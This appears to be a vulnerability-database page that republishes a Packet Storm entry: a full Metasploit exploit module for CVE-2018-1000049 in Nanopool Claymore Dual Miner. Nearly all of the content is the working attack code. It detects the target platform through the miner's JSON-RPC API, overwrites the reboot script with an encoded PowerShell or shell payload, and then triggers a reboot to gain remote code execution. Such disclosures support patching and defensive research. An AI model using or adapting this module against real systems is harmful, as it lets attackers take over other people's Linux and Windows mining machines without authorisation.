Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormReversebrain at snadoPACKETSTORM:148578
HistoryJul 17, 2018 - 12:00 a.m.

Nanopool Claymore Dual Miner APIs Remote Code Execution

2018-07-1700:00:00
reversebrain at snado
packetstormsecurity.com
283

0.504 Medium

EPSS

Percentile

97.2%

JSON
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core/exploit/powershell'  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::Tcp  
include Msf::Exploit::CmdStager  
include Msf::Exploit::Powershell  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Nanopool Claymore Dual Miner APIs RCE',  
'Description' => %q{  
This module takes advantage of miner remote manager APIs to exploit an RCE vulnerability.  
},  
'Author' =>  
[  
'reversebrain@snado', # Vulnerability reporter  
'phra@snado' # Metasploit module  
],  
'License' => MSF_LICENSE,  
'References' =>  
[  
['EDB', '44638'],  
['CVE', '2018-1000049'],  
['URL', 'https://reversebrain.github.io/2018/02/01/Claymore-Dual-Miner-Remote-Code-Execution/']  
],  
'Platform' => ['win', 'linux'],  
'Targets' =>  
[  
[ 'Automatic Target', { 'auto' => true }],  
[ 'Linux',  
{  
'Platform' => 'linux',  
'Arch' => ARCH_X64,  
'CmdStagerFlavor' => [ 'bourne', 'echo', 'printf' ]  
}  
],  
[ 'Windows',  
{  
'Platform' => 'windows',  
'Arch' => ARCH_X64,  
'CmdStagerFlavor' => [ 'certutil', 'vbs' ]  
}  
]  
],  
'Payload' =>  
{  
'BadChars' => "\x00"  
},  
'DisclosureDate' => 'Feb 09 2018',  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptPort.new('RPORT', [ true, 'Set miner port', 3333 ])  
])  
deregister_options('URIPATH', 'SSL', 'SSLCert', 'SRVPORT', 'SRVHOST')  
end  
  
def select_target  
data = {  
"id" => 0,  
"jsonrpc" => '2.0',  
"method" => 'miner_getfile',  
"params" => ['config.txt']  
}.to_json  
connect  
sock.put(data)  
buf = sock.get_once || ''  
tmp = StringIO.new  
tmp << buf  
tmp2 = tmp.string  
hex = ''  
if tmp2.scan(/\w+/)[7]  
return self.targets[2]  
elsif tmp2.scan(/\w+/)[5]  
return self.targets[1]  
else  
return nil  
end  
end  
  
def check  
target = select_target  
if target.nil?  
return Exploit::CheckCode::Safe  
end  
data = {  
"id" => 0,  
"jsonrpc" => '2.0',  
"method" => 'miner_getfile',  
"params" => ['config.txt']  
}.to_json  
connect  
sock.put(data)  
buf = sock.get_once || ''  
tmp = StringIO.new  
tmp << buf  
tmp2 = tmp.string  
hex = ''  
case target['Platform']  
when 'linux'  
hex = tmp2.scan(/\w+/)[5]  
when 'windows'  
hex = tmp2.scan(/\w+/)[7]  
end  
str = Rex::Text.hex_to_raw(hex)  
if str.include?('WARNING')  
return Exploit::CheckCode::Vulnerable  
else  
return Exploit::CheckCode::Detected  
end  
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e  
vprint_error(e.message)  
return Exploit::CheckCode::Unknown  
ensure  
disconnect  
end  
  
def execute_command(cmd, opts = {})  
target = select_target  
case target['Platform']  
when 'linux'  
cmd = Rex::Text.to_hex(cmd, '')  
upload = {  
"id" => 0,  
"jsonrpc" => '2.0',  
"method" => 'miner_file',  
"params" => ['reboot.bash', "#{cmd}"]  
}.to_json  
when 'windows'  
cmd = Rex::Text.to_hex(cmd_psh_payload(payload.encoded, payload_instance.arch.first), '')  
upload = {  
"id" => 0,  
"jsonrpc" => '2.0',  
"method" => 'miner_file',  
"params" => ['reboot.bat', "#{cmd}"]  
}.to_json  
end  
  
connect  
sock.put(upload)  
buf = sock.get_once || ''  
trigger_vulnerability  
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e  
fail_with(Failure::UnexpectedReply, e.message)  
ensure  
disconnect  
end  
  
def trigger_vulnerability  
execute = {  
"id" => 0,  
"jsonrpc" => '2.0',  
"method" => 'miner_reboot'  
}.to_json  
connect  
sock.put(execute)  
buf = sock.get_once || ''  
disconnect  
end  
  
def exploit  
target = select_target  
if target.nil?  
fail_with(Failure::NoTarget, 'No matching target')  
end  
if (target['Platform'].eql?('linux') && payload_instance.name !~ /linux/i) ||  
(target['Platform'].eql?('windows') && payload_instance.name !~ /windows/i)  
fail_with(Failure::BadConfig, "Selected payload '#{payload_instance.name}' is not compatible with target operating system '#{target.name}'")  
end  
case target['Platform']  
when 'linux'  
execute_cmdstager(flavor: :echo, linemax: 100000)  
when 'windows'  
execute_cmdstager(flavor: :vbs, linemax: 100000)  
end  
end  
end  
`

Related

prion 1
packetstorm 1
cve 1
seebug 1
securelist 1
prion
prion
Remote code execution
2018-02-09 23:29:00
packetstorm
packetstorm
Nanopool Claymore Dual Miner 7.3 Remote Code Execution
2018-05-17 00:00:00
cve
cve
CVE-2018-1000049
2018-02-09 23:29:00
seebug
seebug
Claymore Dual Miner Remote Code Execution(CVE-2018-1000049)
2018-05-18 00:00:00
securelist
securelist
New trends in the world of IoT threats
2018-09-18 10:00:36

0.504 Medium

EPSS

Percentile

97.2%

JSON
Related for PACKETSTORM:148578
prion1packetstorm1cve1seebug1securelist1